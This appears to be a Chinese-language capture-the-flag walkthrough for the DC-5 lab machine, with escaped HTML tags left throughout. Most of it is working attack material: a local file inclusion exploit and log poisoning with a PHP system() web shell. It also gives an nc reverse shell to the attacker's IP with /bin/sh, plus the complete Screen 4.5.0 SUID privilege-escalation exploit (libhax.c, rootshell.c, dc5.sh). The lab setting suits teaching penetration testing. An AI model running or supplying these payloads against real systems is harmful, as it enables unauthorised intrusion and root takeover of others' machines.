DC-5靶机渗透测试复现教学文档<\/h1>

1. 环境准备<\/h2>

1.1 靶机设置<\/h3>
将DC-5靶机设置为NAT模式（桥接模式可能无法扫描到）<\/li>
使用
arp-scan<\/code>扫描靶机IP地址：
arp-scan -l
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
1.2 信息收集<\/h3>

使用dirsearch<\/code>扫描靶机Web目录：
dirsearch -u 192.168.130.145
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 漏洞发现与利用<\/h2>
2.1 文件包含漏洞<\/h3>

访问Web界面发现留言板页面<\/li>
观察到页面底部copyright数字随刷新变化<\/li>
确认footer.php<\/code>被包含在其他页面中<\/li>
在thankyou.php<\/code>页面测试文件包含：
http:\/\/192.168.130.145\/thankyou.php?file=\/etc\/passwd
<\/code><\/pre>
<\/li>
<\/ol>
2.2 日志文件包含攻击<\/h3>

构造一句话木马并包含在请求中：
<?<\/span>php<\/span> system<\/span>($_GET['cmd'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
该木马会被记录在Nginx日志文件中（默认路径：\/var\/log\/nginx\/access.log<\/code>）<\/li>
使用蚁剑连接：
http:\/\/192.168.130.145\/thankyou.php?file=\/var\/log\/nginx\/access.log
<\/code><\/pre>
<\/li>
<\/ol>
3. 权限提升<\/h2>
3.1 反弹Shell<\/h3>

在攻击机开启监听：
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre><\/li>
在靶机执行反弹：
nc 192.168.130.128 4444<\/span> -e \/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>
切换到交互式Shell：
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 SUID提权（Screen 4.5.0漏洞利用）<\/h3>
3.2.1 查找SUID文件<\/h4>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现存在screen-4.5.0<\/code>命令<\/p>
3.2.2 漏洞利用准备<\/h4>


创建libhax.c<\/code>文件：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>__attribute__ ((__constructor__))
<\/span><\/span>void<\/span> dropshell(void<\/span>){
<\/span><\/span>    chown("\/tmp\/rootshell"<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>    chmod("\/tmp\/rootshell"<\/span>, 04755<\/span>);
<\/span><\/span>    unlink("\/etc\/ld.so.preload"<\/span>);
<\/span><\/span>    printf("[+] done!<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

编译（注意添加-std=gnu89<\/code>参数）：<\/p>
gcc -fPIC -shared -o libhax.so libhax.c -std=<\/span>gnu89
<\/span><\/span><\/code><\/pre><\/li>

创建rootshell.c<\/code>文件：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>(void<\/span>){
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    seteuid(0<\/span>);
<\/span><\/span>    setegid(0<\/span>);
<\/span><\/span>    execvp("\/bin\/sh"<\/span>, NULL, NULL);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

重要<\/strong>：必须在靶机环境中编译rootshell.c<\/code>：<\/p>
gcc -o rootshell rootshell.c
<\/span><\/span><\/code><\/pre><\/li>

创建dc5.sh<\/code>脚本：<\/p>
echo "[+] Now we create our \/etc\/ld.so.preload file..."<\/span>
<\/span><\/span>cd \/etc
<\/span><\/span>umask 000<\/span> # because<\/span>
<\/span><\/span>screen -D -m -L ld.so.preload echo -ne "\x0a\/tmp\/libhax.so"<\/span> # newline needed<\/span>
<\/span><\/span>echo "[+] Triggering..."<\/span>
<\/span><\/span>screen -ls # screen itself is setuid, so...<\/span>
<\/span><\/span>\/tmp\/rootshell
<\/span><\/span><\/code><\/pre>注意：保存前执行:set ff=unix<\/code>防止格式错误<\/p>
<\/li>
<\/ol>
3.2.3 执行提权<\/h4>

将三个文件上传到靶机\/tmp<\/code>目录<\/li>
在靶机\/tmp<\/code>目录下：
chmod 777<\/span> dc5.sh
<\/span><\/span>.\/dc5.sh
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 获取Flag<\/h2>
find \/ -name *flag*
<\/span><\/span>cat \/root\/thisistheflag.txt
<\/span><\/span><\/code><\/pre>关键注意事项<\/h2>

GLIBC版本问题<\/strong>：必须在靶机环境中编译rootshell.c<\/code>，否则可能因GLIBC版本不匹配导致提权失败<\/li>
文件格式<\/strong>：确保脚本文件使用Unix格式（LF换行）<\/li>
编译参数<\/strong>：高版本gcc需要添加-std=gnu89<\/code>参数<\/li>
权限设置<\/strong>：确保dc5.sh<\/code>有执行权限（777）<\/li>
<\/ol>
通过以上步骤，可以完整复现DC-5靶机的渗透测试过程，从初始信息收集到最终获取root权限。<\/p>